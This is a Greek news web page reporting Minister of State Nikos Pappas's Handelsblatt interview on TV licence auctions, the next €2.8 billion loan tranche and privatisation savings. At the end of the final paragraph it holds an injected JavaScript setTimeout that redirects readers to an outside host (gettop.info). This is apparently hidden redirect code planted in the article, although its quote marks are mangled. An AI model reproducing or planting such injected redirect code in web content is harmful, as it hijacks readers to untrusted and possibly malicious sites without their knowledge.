Παππάς: Αντί πλειστηριασμού για τις άδειες υπήρχε καρτέλ ιδιωτικών παρόχων

0
7

 

Στον διαγωνισμό για τις τηλεοπτικές άδειες αλλά και για τη νέα δόση που αναμένεται η εκταμίευση της μίλησε σε συνέντευξή του στη γερμανική εφημερίδα Handelsblatt ο υπυοργός Επικρατείας Νίκος Παππάς.

Όσον αφορά στις μεταρρυθμίσεις είπε πως αυτές που έγιναν ήταν οι δυσκολότερες από πολιτικής απόψεως, οι υπόλοιπες βρίσκονται σε καλό δρόμο και είναι λιγότερο αμφιλεγόμενες. Πρόσθεσε, εξάλλου, ότι τίποτα δεν εμποδίζει την καταβολή της επόμενης δόσης των δανείων ύψους 2,8 δισ. ευρώ μέχρι το τέλος Οκτωβρίου. «Δεν θα υπάρξουν καθυστερήσεις όπως πέρυσι, αυτό είναι αναμφισβήτητο» επεσήμανε ο υπουργός.

Ιδιωτικοποίησεις όπως εκείνες των αεροδρομίων ή του λιμένος Πειραιώς αποδεικνύουν ότι η ελληνική κυβέρνηση τηρεί τι δεσμεύσεις της είπε υπογραμμίζοντας πως χάρη στις νέες διαπραγματεύσεις για την κατασκευή αυτοκινητοδρόμων εξοικονομήθηκαν 750 εκατομμύρια ευρώ, η δε πώληση των αδειών σε τηλεοπτικούς σταθμούς συνεισέφερε 250 εκατομμύρια ευρώ. «Παλαιότερα αντί του πλειστηριασμού (για τις τηλεοπτικές άδειες) υπήρχε ένα είδος καρτέλ ιδιωτών παρόχων, αυτό το αλλάξαμε», είπε ο υπουργός Επικρατείας στη Handelsblatt. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here